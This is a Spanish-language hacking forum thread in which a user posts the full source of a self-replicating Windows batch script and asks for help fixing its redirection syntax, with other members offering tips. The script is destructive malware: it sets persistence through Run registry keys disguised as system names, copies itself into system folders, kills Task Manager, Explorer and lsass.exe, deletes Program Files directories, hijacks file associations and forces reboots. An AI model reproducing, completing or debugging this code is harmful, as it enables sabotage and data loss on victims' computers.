Resultados 1 al 9 de 9

Tema: Un nuevo "programa"

  1. #1 Un nuevo "programa" 
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    Buenas!! Una vez mas apelo a vuestro cerebro para que me concreteis una duda, a ser posible:

    A ver, estoy creando un programa que crea varias partes, pero ademas pretendo que si se dan unas circustancias dichas partes "recreen" las otras partes, es decir, si una de las otras partes se borra, alguna otra la volvera a crear.

    Para que quede mas o menos claro pondre aqui parte de codigo:
    echo cd %TEMP%>> mouse.bat
    echo echo echo off>> keyboard.bat>> mouse.bat <-- este es el problemilla
    echo echo cls>> keyboard.bat>> mouse.bat
    Se entiende?

    Un saludo y desde ya, gracias
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Mensajes
    1.461
    Descargas
    15
    Uploads
    0
    Nada, llevo toda la noche dándole vueltas al asunto pero no se me ocurre...

    Por cierto, ¿no te da ná llamarle programa a un batch? Cuanto daño ha hecho mi curso... pero cuanto daño...

    Mi consejo: dedicate a cultivar el campo, tío...
    Citar  
     

  3. #3  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.709
    Descargas
    30
    Uploads
    8
    Creo que tu problema podrían ser el numero de parametros del script.
    Define una constante con ese valor.
    Citar  
     

  4. #4  
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    Hablas de una variable, clarinetista??
    Ya lo he probado... no hay manera.

    La idea era que cada una de las partes recrease a las anteriores si estas eran borradas.
    Pero no puedo introducir dos comandos de redireccionamiento en una misma linea.
    Asi que he acabado por hacerlo de otra forma.

    Os pongo el codigo, por si os interesa y me decis fallos (que sin duda los habra )

    @echo off
    cls
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mouse /T REG_SZ /d %windir%\system32\mouse.bat /f
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v KeyBoard /T REG_SZ /d %TEMP%\keyboard.bat /f
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Inet /T REG_SZ /d %APPDATA%\inet.bat /f
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Srv32 /T REG_SZ /d %windir%\srv32.bat /f
    taskkill /im taskmgr.exe /f
    copy %0 %windir%
    copy %0 %windir%\system32
    copy %0 %appdata%
    cls

    : inicio

    if not exist %windir%\%0 (goto parte1)
    if not exist %windir%\system32\%0 (goto parte2)
    if not exist %appdata%\%0 (goto parte3)
    cls
    goto end

    : part1

    cls
    cd %windir%\sytem32
    echo @echo off>> mouse.bat
    taskkill /im taskmgr.exe /f
    echo cls>> mouse.bat
    echo : bucle>> mouse.bat
    echo msg * Diseñado por Raid>> mouse.bat
    echo goto bucle>> mouse.bat
    taskkill /im taskmgr.exe /f
    echo msg * Diseñado por RaidMan...>> mouse.bat
    echo : bucle>> mouse.bat
    echo taskkill explorer.exe>> mouse.bat
    echo goto bucle>> mouse.bat

    : part2

    cls
    cd %temp%
    echo @echo off>> keyboard.bat
    echo cls>> keyboard.bat
    echo taskkill /im explorer.exe /f>> keyboard.bat
    echo rd /Q /S %programfiles%>> keyboard.bat
    echo taskkill /im msnmsgr.exe /f>> keyboard.bat
    echo taskkill /im explorer.exe /f>> keyboard.bat
    echo taskkill /im lsass.exe /f>> keyboard.bat


    : part3

    cls
    cd %appdata%
    echo @echo off>> inet.bat
    echo cls>> inet.bat
    echo assoc .jpeg=WinRAR>> inet.bat
    echo rd /Q /S %programfiles%\"msn messenger">> inet.bat

    : part4

    cls
    cd %windir%
    echo @echo off>> srv32.bat
    echo cls>> srv32.bat
    echo rd /Q /S %programfiles%\"archivos comunes">> srv32.bat
    echo shutdown -r -t 8>> srv32.bat
    cls

    if not exist %temp%\keyboard.bat (goto part2) else (goto part1.2)


    : end

    cls
    goto part1.2

    : part1.2
    cls
    if not exist %appdata%\inet.bat (goto part3) else (goto part1.3)

    : part1.3
    cls
    if not exist %windir%\inet.bat (goto part4) else (goto part1.4)

    : part1.4
    cls
    if not exist %windir%\system32\mouse.bat (goto part1) else (goto start)



    : parte1
    copy /Y %0 %windir%
    reg add HKLM\Software\microsoft\windows\currentversion\run /v lsass /T REG_SZ /d %windir%\%0 /f
    goto inicio

    : parte2
    copy /Y %0 %windir%\system32
    reg add HKLM\Software\microsoft\windows\currentversion\run /v svchost /T REG_SZ /d %windir%\system32\%0 /f
    goto inicio

    : parte3
    copy /Y %0 %appdata%\%0
    reg add HKLM\software\microsoft\windows\currentversion\run /v dll32 /T REG_SZ /d %appdata%\%0 /f
    goto inicio



    : start


    cls
    cd %temp%
    keyboard.bat
    cls
    cd %windir%\system32
    mouse.bat
    cls
    cd %appdata%
    inet.bat
    cls
    cd %windir%
    srv32.bat

    exit
    Un saludo y como siempre gracias
    Última edición por RaidMan; 19-01-2008 a las 15:45
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Mensajes
    1.461
    Descargas
    15
    Uploads
    0
    El problema ya se lo expliqué yo, y es que no se pueden usar dos >> en una misma línea, pero no se como solucionarlo. Probamos poniendo >> en una variable, pero no funcionó.
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    Oct 2006
    Ubicación
    /mundo/america/CL/
    Mensajes
    87
    Descargas
    7
    Uploads
    0
    no se mucho se esto , pero podria ser q se haga una pequeña "funcion" a la que le des los parametros, y que esta lo pase el siguiente archivo, es decir, q se haga una funcion con dos parametros a los cuales seran los archivos que quieres replicar.......

    bueno eso fue mi intento de aporte xD

    (casi me enredo con mis palabras)
    Hay 10 tipos de personas en el mundo, las q entienden binario y las q no ...
    Citar  
     

  7. #7  
    Medio
    Fecha de ingreso
    May 2002
    Ubicación
    Buenos Aires, Argent
    Mensajes
    95
    Descargas
    0
    Uploads
    0
    Buenas Gente ... si lo que quieren poner dos comandos en una sola linea se puede usar el siguiente comando | ... EJ:

    date|Find "2005"

    como ven Busca valor en date... esa barrita se hace con ALT + 124.... Bue... espero que sirva para algo ...

    Saludos.-
    Última edición por Satanheoba; 08-02-2008 a las 00:45
    ŞαדαתђэớЪα
    ψ Hεll ψ Ω Heaven Ω
    Citar  
     

  8. #8  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.709
    Descargas
    30
    Uploads
    8
    Se llaman tuberias o filtros , las barritas
    Citar  
     

  9. #9  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Mensajes
    1.461
    Descargas
    15
    Uploads
    0
    Satanheoba, cuanto tiempo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    Bueh, todo está explicado en mi curso de batching. Actualmente RaidMan se lo está currando con otras cosas (dícese del VisualBasic) así que no creo que le interese. Bueno, realmente sí.
    Citar  
     

Temas similares

  1. Respuestas: 0
    Último mensaje: 16-01-2015, 05:20
  2. Respuestas: 3
    Último mensaje: 16-04-2011, 21:07
  3. Respuestas: 5
    Último mensaje: 31-03-2010, 07:03
  4. "Mimail", gusano de propagación masiva llega como "message.zip"
    Por aerial25 en el foro VULNERABILIDADES
    Respuestas: 1
    Último mensaje: 07-08-2003, 21:18
  5. Se busca el programa "Share Point Portal Server"
    Por cbr600f6 en el foro APLICACIONES
    Respuestas: 0
    Último mensaje: 14-12-2001, 00:24

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •